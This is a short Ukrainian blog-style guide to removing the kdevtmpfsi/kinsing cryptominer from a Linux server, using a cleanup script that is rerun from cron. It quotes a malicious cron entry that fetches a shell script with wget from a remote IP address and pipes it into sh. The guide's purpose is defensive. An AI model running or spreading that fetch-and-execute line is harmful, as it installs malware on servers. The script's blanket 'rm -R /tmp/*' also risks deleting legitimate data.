04 грудня, Субота, 2021
A- A A+

Пошук

kdevtmpfsi

Цей вірус найчастіше з*являється у вас на сервераз, за рахунок використання безкоштовних, або ломаних плагінів, модулей для відомих CMS

Також є уразливість php7.0-fpm, та багато інших шляхів

Перш за все перевіряємо логи планувальника

tail -f /var/log/cron.log

/var/spool/cron/crontabs/myuser:* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1

У crontab є підозріла робота, яка використовується wget для завантаження sh сценарію, після чого він створює тимчасовий файл в папці /tmp з майнером (вырусом kdevtmpfsi)

Поки ми шукаєм основну причину поки робимо костить для видалення шкідника з нашого сервера

Створюєм файл /home/Download/antiminer.sh

#!/bin/bash
kill -9 $(pidof kdevtmpfsi)
kill -9 $(pidof kinsing)
rm -f /tmp/kdevtmpfsi ; echo "ALL_GOOD_HERE" > /tmp/kdevtmpfsi
rm -f /var/tmp/kinsing ; echo "ALL_GOOD_HERE" > /var/tmp/kinsing
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
rm -R /tmp/*
#chmod -R go-x /tmp
#chmod -R 0777 /tmp/
#chmod -R go-x /var/tmp
#chmod -R 0777 /var/tmp/

Параметри chmod - то як додаткові параметри, я їх закоментував

Після збереження файлу нам потрібно закинути його так само в планувальник crontab -e

# Запускати кожні 3 хв
*/3 * * * * /home/Download/antiminer.sh

Зберігаєм файл і service cron restart